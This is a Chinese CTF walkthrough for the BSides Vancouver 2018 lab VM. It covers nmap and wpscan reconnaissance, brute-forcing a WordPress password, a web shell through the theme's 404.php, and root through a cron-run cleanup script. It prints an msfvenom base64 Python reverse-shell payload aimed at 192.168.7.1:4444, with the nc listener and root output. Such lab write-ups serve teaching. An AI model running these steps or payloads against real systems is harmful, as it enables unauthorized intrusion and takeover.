关于

  1. 下载链接
  2. 目标:拿到root用户目录下的flag.txt
  3. 全程无图!

信息收集

  1. 因为虚拟机网络是设置Host-only,所以是vmnet1这张网卡,IP段为192.168.7.1/24
  2. nmap -T4 192.168.7.1/24 -A

Nmap scan report for 192.168.7.128

Host is up (0.00040s latency).

Not shown: 997 closed ports

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.3.5

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x    2 65534    65534        4096 Mar 03 17:52 public

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)

|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)

|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

| http-robots.txt: 1 disallowed entry

|_/backup_wordpress

|_http-server-header: Apache/2.2.22 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds

  1. 从上面可以看到服务器开放了21端口,对应的是FTP服务,还是可以匿名访问的。

    浏览器服务:ftp://192.168.7.128/public/users.txt.bk

  2. 还开放了80端口,robots.txt里有一个/backup_wordpress目录

    很明显式一个WordPress,直接上wpscan扫一下

  3. wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate

[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2

 |  Last updated: 2018-05-17T00:00:00.000Z

 |  Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/

 |  Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt

[!] The version is out of date, the latest version is 1.5

 |  Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css

 |  Referenced style.css: wp-content/themes/twentysixteen/style.css

 |  Theme Name: Twenty Sixteen

 |  Theme URI: https://wordpress.org/themes/twentysixteen/

 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...

 |  Author: the WordPress team

 |  Author URI: https://wordpress.org/

[+] Enumerating usernames ...

[+] We identified the following 2 users:

    +----+-------+------+

    | ID | Login | Name |

    +----+-------+------+

    | 1  | admin | admi |

    | 2  | john  | joh  |

    +----+-------+------+

[!] Default first WordPress username 'admin' is still used

其实很多漏洞都是XSS或其他需要管理员交互的漏洞,所以很难利用。这里收集到的有博客用的主题,管理员的用户名为john,在博客写的也可以看出来。

爆破

  1. wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt

  2. 得到密码是enigma

  3. 登录改主题的404.php,getshell后发现没有root权限。

  4. 获取任务定时计划cat /etc/crontab

    # /etc/crontab: system-wide crontab
    
# Unlike any other crontab you don't have to run the `crontab'
    
# command to install the new version when you edit this file
    
# and files in /etc/cron.d. These files also have username fields,
    
# that none of the other crontabs do.

SHELL=/bin/sh
    
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
    
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    
*  *    * * *   root    /usr/local/bin/cleanup

  5. 在这可以看到有一个用root权限运行的cleanup的脚本。

  6. 先生成反弹shell的payload

kali-team@LTS:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R

[sudo] kali-team 的密码: 

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload

[-] No arch selected, selecting arch: cmd from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 601 bytes

python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICAgICAgIHN1YnByb2Nlc3MgICAgICwgICAgICAgICBvcyAgICAgOyAgICAgICBob3N0PSIxOTIuMTY4LjcuMSIgICAgIDsgICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgICAgICAgcG9ydCkpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDApICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDEpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDIpICAgICA7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
  1. 用nc监听本地的4444端口nc -lvp 4444
  2. 把payload复制到cleanup脚本里保存,坐等shell反弹回来
  3. 获取flag
kali-team@LTS:~$ nc -lvp 4444

Listening on [0.0.0.0] (family 0, port 4444)

Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)

ls

flag.txt

id

uid=0(root) gid=0(root) groups=0(root)

cat flag.txt

Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.

You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.

Did you find them all?

@abatchy17

write-up录像

CTF-BSides Vancouver: 2018 (Workshop)

[Write-up]BSides-Vancouver的更多相关文章

  1. Hacking Bsides Vancouver 2018 walkthrough

    概述: Name: BSides Vancouver: 2018 (Workshop) Date release: 21 Mar 2018 Author: abatchy Series: BSides ...

  2. ROSCon 2017通知 Announcing ROSCon 2017: September 21st and 22nd in Vancouver

    ROSCon 2017通知:9月21日和22日在温哥华 我们很高兴地宣布,2017年ROSCon将在举行9月21-22日,2017年温哥华会议中心在加拿大温哥华.2017年IROS将在同一地点9月24 ...

  3. 深入理解 Java G1 垃圾收集器--转

    原文地址:http://blog.jobbole.com/109170/?utm_source=hao.jobbole.com&utm_medium=relatedArticle 本文首先简单 ...

  4. LINQ to SQL语句(7)之Exists/In/Any/All/Contains

    适用场景:用于判断集合中元素,进一步缩小范围. Any 说明:用于判断集合中是否有元素满足某一条件:不延迟.(若条件为空,则集合只要不为空就返回True,否则为False).有2种形式,分别为简单形式 ...

  5. 年终巨献 史上最全 ——LINQ to SQL语句

    LINQ to SQL语句(1)之Where 适用场景:实现过滤,查询等功能. 说明:与SQL命令中的Where作用相似,都是起到范围限定也就是过滤作用的,而判断条件就是它后面所接的子句.Where操 ...

  6. Linq to SQL 语法查询(链接查询,子查询 & in操作 & join,分组统计等)

    Linq to SQL 语法查询(链接查询,子查询 & in操作 & join,分组统计等) 子查询 描述:查询订单数超过5的顾客信息 查询句法: var 子查询 = from c i ...

  7. JS组件系列——Bootstrap组件福利篇:几款好用的组件推荐(二)

    前言:上篇 JS组件系列——Bootstrap组件福利篇:几款好用的组件推荐 分享了几个项目中比较常用的组件,引起了许多园友的关注.这篇还是继续,因为博主觉得还有几个非常简单.实用的组件,实在不愿自己 ...

  8. 【转载】关于treeview的多层显示的科学用法!

    http://blogs.msdn.com/b/mikehillberg/archive/2009/10/30/treeview-and-hierarchicaldatatemplate-step-b ...

  9. MapReduce的核心资料索引 [转]

    转自http://prinx.blog.163.com/blog/static/190115275201211128513868/和http://www.cnblogs.com/jie46583173 ...

  10. Java Programming Language Enhancements

    引用:Java Programming Language Enhancements Java Programming Language Enhancements Enhancements in Jav ...

随机推荐

  1. sping中AOP

    委托代理的概念: 委托类对象就是我们后面说到的"目标对象", 也就是需要[被]代理的对象 target代理类对象就是我们后面说到的"代理对象",目标对象就是需要 ...

  2. JAVA8-用lamda表达式和增强版Comparator进行排序

    1.单条件升序: list.sort(Comparator.comparing(User::getId); 2.降序: list.sort(Comparator.comparing(User::get ...

  3. JS-原生的ajax

    记录一下: //post需要设置请求头 setRequestHeader(name, value)name //头部的名称:这个参数不应该包括空白.冒号或换行 //value 头部的值:这个参数不应该 ...

  4. 解决IDEA快捷键 Alt+Insert 失效的问题

    现象 IDEA快捷键 Alt+Inser 失效,单击右键也不出现[Generate]. 这个问题经常出现在重新安装IDEA后. 原因 缺少2个插件 解决办法 在setting中启用这2个插件即可.这2 ...

  5. loadrunner测试sql语句性能

    最初的想法是是想通过录制在SQL Server2008的操作来着的,无奈试了即便都录不到查询的sql语句,网上查资料全是关于SQL 2000的(这部分有经验的欢迎指教). 于是只能通过直接调用load ...

  6. cssdiv设置高宽百分比不起作用的问题

    div等元素设置宽高百分比都是基于包含他的块级对象的百分比高度,所以必须先设置包含它的块级对象高度与宽度,但是光设置body是不起作用的,必须同时设置html和body.   要使用百分比设置div宽 ...

  7. 【原】mac电脑使用总结

    mac下终端配置(item2+oh-my-zsh)+solarized配色方案:https://www.cnblogs.com/weixuqin/p/7029177.html

  8. 【PAT甲级】1060 Are They Equal (25 分)(需注意细节的模拟)

    题意: 输入一个正整数N(<=100),接着输入两个浮点数(可能包含前导零,对于PAT已经习惯以string输入了,这点未知),在保留N位有效数字的同时判断两个数是否相等,并以科学计数法输出. ...

  9. 设计模式课程 设计模式精讲 3-4 依赖倒置原则讲解+coding

    1 课程讲解 1.1 定义 1.2 优点 1.3 细节描述 2 代码演练 2.0 代码展示优点 2.1 非面向接口编程 2.2 面向接口编程1 传参 2.3 面向接口编程2 构造函数 2.4 面向接口 ...

  10. springboot中关于datasource的配置

    datasource spring.dao.exceptiontranslation.enabled: 是否开启PersistenceExceptionTranslationPostProcessor ...